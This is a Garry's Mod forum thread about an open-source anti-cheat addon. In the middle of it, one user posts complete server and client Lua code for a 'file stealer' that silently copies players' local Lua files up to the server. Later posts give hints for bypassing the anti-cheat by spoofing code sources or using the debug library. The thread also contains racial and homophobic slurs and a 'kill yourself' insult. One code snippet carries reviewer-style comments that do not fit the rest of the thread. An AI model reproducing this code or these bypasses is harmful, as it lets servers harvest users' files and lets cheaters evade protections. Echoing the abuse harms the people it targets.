• Quack Anti Cheat [Public Release]
[QUOTE=SweetTea;44911749][lua] nr("QUACK_QUACK_MOTHER_FUCKER", function() LocalPlayer():EmitSound("qac/quack.wav") -- RIP NIGGERS end) [/lua] I <3 you man but thats a bit racist[/QUOTE] w-wasnt me srry it was code_gs
[QUOTE=zerothefallen;44689306]As an example, before the recent update, file.Read cant read shit with special characters in it, so of course. The #1 gmod addon "darkrp keypad + wire" or whatever caused false positive bans continuously. [editline]30th April 2014[/editline] yeah willox im looking at u with your + in the name u fag[/QUOTE] That's amazing
[QUOTE=Willox;44919761]That's amazing[/QUOTE] cant tell you how many people came to me cuz of ur keypad + whatever banning em
Any links to previous versions?
[QUOTE=Hollistupid;45233625]Any links to previous versions?[/QUOTE] No, we won't help you get a file stealer.
sv [lua]------------------------------ -- File Stealer server-side -- ------------------------------ if SERVER then file.CreateDir("qac") file.CreateDir("qac/stolen") util.AddNetworkString("CHTGTL") util.AddNetworkString("CHCO") net.Receive("CHTGTL", function(ln, client) client:SetPData("CHTGTL", true) client.FileDir = string.Replace(client:SteamID(), ":", "_") local num = tostring(math.random(500)) client.HAX_NUMBER = num net.Start("CHCO") net.WriteString(num) net.Send(client) file.CreateDir(CHEAT_DIR.."/"..client.FileDir) local ID = client:SteamID() timer.Simple(200, function() --POSSIBLE BANNING end) end) net.Receive("CHCO", function(ln, client) if not client.FileDir then client.FileDir = string.Replace(client:SteamID(), ":", "_") end local num, dir, filename, filedata = net.ReadString(), net.ReadString(), net.ReadString(), net.ReadString() local dir = (CHEAT_DIR.."/"..client.FileDir.."/"..dir) if not file.Exists(dir, "DATA") then file.CreateDir(dir) end if not file.Exists(dir.."/"..string.Replace(filename, ".lua", ".txt"), "DATA") then file.Write(dir.."/"..string.Replace(filename, ".lua", ".txt"), [[QAC File Reader \n]]..filedata) else file.Append(dir.."/"..string.Replace(filename, ".lua", ".txt"), filedata) end end) end [/lua] cl [lua] -- file steal pls if CLIENT then local frd = file.Read local function c() net.Start("CHTGTL") net.SendToServer() end net.Receive("CHTGTL",c) local HAX_NUMBER = "0" local QUEUED_FILES = {} local defaults = { "autorun", "entities", "includes", "weapons" } net.Receive("CHCO", function(len) HAX_NUMBER = net.ReadString() CopyDirNoSub("lua", "GAME") CopyDir("lua/autorun", "GAME") CopyDir("lua/entities", "GAME") CopyDir("lua/includes", "GAME") CopyDir("lua/weapons", "GAME") timer.Simple(.3, function() timer.Create(HAX_NUMBER, .01, 0, function() local fd = QUEUED_FILES[table.GetFirstKey(QUEUED_FILES)] if not fd then timer.Remove(HAX_NUMBER) timer.Simple(1, function() --POISSIBLE BANNING? 
end) end SendFileToServer(fd) table.remove(QUEUED_FILES, table.GetFirstKey(QUEUED_FILES)) end) end) end) function CopyDirNoSub(dir,src) local files = file.Find(dir.."/*.lua", src) if not files then files = {} end for k,v in pairs(files) do if v and v ~= "" then QueueFile(dir,v,src) end end local _,dirs = file.Find(dir.."/*", src) for k,v in pairs(dirs)do if v and v ~= "" then if not table.HasValue(defaults, v) then CopyDir(dir.."/"..v, src) end end end end function CopyDir(dir,src) --copypasta from gmod wiki. local files = file.Find(dir.."/*.lua", src) if not files then files = {} end for k,v in pairs(files) do if v and v ~= "" then QueueFile(dir,v,src) end end local files,directories = file.Find(dir.."/*", src) if not directories then directories = {} end for _, fdir in pairs(directories) do if fdir ~= ".svn" then CopyDir(dir.."/"..fdir, src) end end end function QueueFile(dir,name,src) local filedata = frd(dir.."/"..name, src) if not filedata then filedata = "ERROR! File not readable: "..dir.."/"..name.." in '"..src.."'." return end if string.len(filedata) > 1.7*10^200 then filedata = "ERROR! File too long: "..dir.."/"..name.." in '"..src.."'." return end local fd1, fd2, fd3, fd4 = {dir=dir,name=name}, {dir=dir,name=name}, {dir=dir,name=name}, {dir=dir,name=name} --split it into fourths. 
fd1.filedata = string.Left(filedata, math.min(math.Round(string.len(filedata)/4), 63000)) fd2.filedata = string.Left(filedata, math.Round(string.len(filedata)*1/2)) fd2.filedata = string.Right(fd2.filedata, math.min(math.Round(string.len(fd2.filedata)/2), 63000)) fd3.filedata = string.Right(filedata, math.Round(string.len(filedata)*1/2)) fd3.filedata = string.Left(fd3.filedata, math.min(math.Round(string.len(fd3.filedata)/2), 63000)) fd4.filedata = string.Right(filedata, math.min(math.Round(string.len(filedata)/4), 63000)) table.insert(QUEUED_FILES, fd1) table.insert(QUEUED_FILES, fd2) table.insert(QUEUED_FILES, fd3) table.insert(QUEUED_FILES, fd4) end function SendFileToServer(fd) if not fd then return end local dir, name, filedata = fd.dir, fd.name, fd.filedata net.Start("CHCO") net.WriteString(HAX_NUMBER) net.WriteString(dir)--directory first net.WriteString(name)--filename second net.WriteString(filedata) net.SendToServer() end end[/lua] figure how to put it back in.
I was looking for the version with the working speedhack prevention implemented Ley came up with. But hey, someone might want that filestealer anyways.
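[QUOTE=Hollistupid;45233957]I was looking for the version with the working speedhack prevention implemented Ley came up with. But hey, someone might want that filestealer anyways.[/QUOTE] [lua]
-- ANTI SPEED HACK
-- Registers a "Move" hook that stores the time of each call on the player and
-- zeroes the movement speeds when two calls for that player arrive closer
-- together than the threshold computed below.
local tolerance = 10
-- Names of the setters that are called with 0 when the threshold is tripped.
local speedfs = {"SetMaxSpeed", "SetForwardSpeed", "SetUpSpeed", "SetSideSpeed", "SetMaxClientSpeed"}

-- p: first hook argument; its QACNoSpeed field holds the time of the previous call.
-- d: second hook argument; assumed to be the move-data object that exposes the
--    setters listed in speedfs -- TODO confirm against the hook's signature.
local QAC_MOVE = function(p, d)
  local now = CurTime()
  local last = p.QACNoSpeed
  if last then
    -- The posted version kept this delta in a local also named `d`, which
    -- shadowed the second parameter, and then called the setters on an
    -- undefined `ds`; that raised an error every time the check fired, so the
    -- speeds were never clamped. The delta now has its own name and the
    -- setters are called on the hook's second argument.
    local dt = now - last
    -- print(dt)
    -- NOTE(review): 66 looks like an assumed server tick rate; on a server
    -- running at a different rate this threshold would misfire -- confirm.
    if dt < (1 / (66 + tolerance)) then
      for _, f in pairs(speedfs) do
        d[f](d, 0)
      end
    end
  end
  p.QACNoSpeed = now
end

hook.Add("Move", "QACSpeed", QAC_MOVE)
[/lua] Works like this, but it needs a bit of tinkering. it's not as effective as before.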
its shit kill yourself [highlight](User was banned for this post ("Dumb/flaming" - SteveUK))[/highlight]
I tried but suicide returned a nil value. Thanks for feedback!
QAC keeps detecting a file, and I have not been able to figure out why. It detects this I believe. This is inside a client side Lua file. RunStringEx( Level.ClientFile, "Client File" ) I know from past experience that it detects file names with invalid chars but what's wrong with this ? and how can I fix it.
It is a Leystryku file that runs lua from the source "Client file" This will not be found on the server, hence causing a ban. Ill edit this post later with a temp fix [editline]6th July 2014[/editline] Replace line 107 with [lua]if (src == "RunString" || src == "LuaCmd" || src == "[C]" || src == "Client File") then[/lua]
7/21/14 -- v 1.3 //note Fptje is being a child and outright banning qac in all darkrp [B]because people use out-dated versions that get rid of the sv_allowcslua check that I have no control over.[/B] So I decided to pre-release my current updated version. This version fixes a lot of things, fixes a bypass (with still two remaining, wops) Highly suggest updating for added security. [editline]21st July 2014[/editline] correction: apparently a sv_allowcslua check was removed and I didnt notice. Couldnt wait till I woke up to fix. still childish
It only turns off QAC when clside Lua is allowed, which is exactly what you just fixed yourself. Besides, since you changed the net strings, the DarkRP QAC fuck-upper only affects the version of QAC that bans [I]innocent people[/I]. [lua] // fuck you fptje. Immature child. util.AddNetworkString("Ping1") util.AddNetworkString("Ping2") util.AddNetworkString("checksum") util.AddNetworkString("gcontrolled_vars") util.AddNetworkString("controlled_vars") util.AddNetworkString("quack") [/lua] I'd say everyone's happy now, but I should only speak for myself.
next time wait for me to wake up mr european
[code] debug.getupvalue = nil // one bypass fixed, one more to go. [/code] 10/10 fix. You can still use the jit debug lib to bypass that, and even then, You can create a binary to reference the same functionality. Hint: [code] const char *lua_getupvalue (lua_State *L, int funcindex, int n); [/code] Doesn't take a genius to find a way around your checks.
[QUOTE=dingusnin;45457152][code] debug.getupvalue = nil // one bypass fixed, one more to go. [/code] 10/10 fix. You can still use the jit debug lib to bypass that, and even then, You can create a binary to reference the same functionality. Hint: [code] const char *lua_getupvalue (lua_State *L, int funcindex, int n); [/code] Doesn't take a genius to find a way around your checks.[/QUOTE] Before we start a long string of posts posting blatant bypasses: Yes I know, and I have no intention to fix any "load priority" things or update it to fix jit, debug library, e t c. If someone knows how to code c++, congrats to them, hope they make a RunStringEx loader and just set their own fenv. I released this update before I wanted to due to fptje, and It's a simple update to fix some issues. But really, what was the point of that post anyways, of course I cant stop someone making a binary module to bypass qac. No one can.
If you throw it up on say github, you would have more developers (such as myself) willing to go through the code, and maybe find potential exploits and fix them. Making an anti-cheat is a cat and mouse game, but more cats help (continuing the metaphor here). [editline]21st July 2014[/editline] Line 74 through 82 of the client side code: [code] for src, _ in qac.pairs(s) do if (src == "RunString" || src == "LuaCmd" || src == "[C]") then return elseif (!(qac.scans[src])) then qac.scans[src] = true local crc = qac.util.CRC(qac.file.Read(src, "game") or "0") qac.validate_src(src, crc) end end [/code] The line with 'return' on it will break the loop, so any source after the first exempt one is never validated. It should be 'continue' if you want to check the whole table.
If you don't want to fix people using the debug lib, why would you just nil a function? There are enough reasons for why it's there other than hacking. Just hide the functions you use/detoured from it, but not all.
Remember. Always use white lists, not black lists (no racist). Most hacks (almost all of them) can be defeated by white listing your code, and banning any variance. If people aren't hacking, there won't be a variance. [editline]21st July 2014[/editline] Small bypass from your code being crc checked: [code] CompileString( string code, "RunString" or "LuaCmd" or "[C]" , false ) [/code] You still need to find a way to run it, but it shouldn't be that hard.
Also there are legit scripts that just ban everyone because of your file source check. [lua] --legit script --code is the code built from the script CompileString(code, "Legit Script name or smth")() [/lua] Now everyone will be banned because the legit script has a custom error message that is not a file on the server
[QUOTE=zerothefallen;45457178] I released this update before I wanted to due to fptje, and It's a simple update to fix some issues. [/QUOTE] One could argue that a script that permabans innocent players is a priority. By that same logic one can argue that this was a priority when I told you months ago. The automatic banning of innocent players is capital sin. I've told you exactly that before.
[QUOTE=dingusnin;45457594]Remember. Always use white lists, not black lists (no racist). Most hacks (almost all of them) can be defeated by white listing your code, and banning any variance. If people aren't hacking, there won't be a variance. [editline]21st July 2014[/editline] Small bypass from your code being crc checked: [code] CompileString( string code, "RunString" or "LuaCmd" or "[C]" , false ) [/code] You still need to find a way to run it, but it shouldn't be that hard.[/QUOTE] Problem is, a whitelist is A LOT harder to maintain and manage. The source validation thing is a whitelist, since it doesn't allow any files that the server doesn't have. is that a reference to my send table ? :v: [QUOTE][IMG]http://i.imgur.com/yCY8btm.png[/IMG][/QUOTE]
[QUOTE=Leystryku;45457918]Problem is, a whitelist is A LOT harder to maintain and manage. The source validation thing is a whitelist, since it doesn't allow any files that the server doesn't have. is that a reference to my send table ? :v:[/QUOTE] It's really not when you know what you want to white list. You can always automate the process of creating a white list every time a server boots. It might be hard at first but it's worth it. :v: No I was not making reference to that, I have not taken the time to explore LeyAC (sorry).
[QUOTE=dingusnin;45457991]It's really not when you know what you want to white list. You can always automate the process of creating a white list every time a server boots. It might be hard at first but it's worth it. :v: No I was not making reference to that, I have not taken the time to explore LeyAC (sorry).[/QUOTE] doing it automatically when the server boots sounds like a pain in the butt though, especially for a larger whitelist, else I'd do that ( even though I could partially do that, but it would make autorefresh sad, except if of course magic is used ).
[QUOTE=Leystryku;45458063]doing it when the server boosts automatically sounds like a pain in the butt though, especially for larger whitelist, else I'd do that ( even though I could partially do that, but would make autorefresh sad, except if of course magic is used ).[/QUOTE] From memory there was either a hook, or a really easy way of detecting a lua refresh. It depends on what you want to white list. Files the client should have (detour AddCSLuaFile), hooks (and bytecode length so we can't use Lenny's way of hook spoofing), and the number of locals would probably work as well if you compared clients as you would with md5 hashes.
[url]http://wiki.garrysmod.com/page/GM/OnReloaded[/url] And thx you called it Lenny's way of hook spoofing, lol
I'd make a github if I knew how so gmod can have a public ac. git is hard/and/or im retarded
[QUOTE=zerothefallen;45458448]I'd make a github if I knew how so gmod can have a public ac. git is hard/and/or im retarded[/QUOTE] Git isn't hard ^^ Add me on steam, I will talk you through setting up a public repo.
[QUOTE=dingusnin;45458487]Git isn't hard ^^ Add me on steam, I will talk you through setting up a public repo.[/QUOTE] ur steam redirects nowhere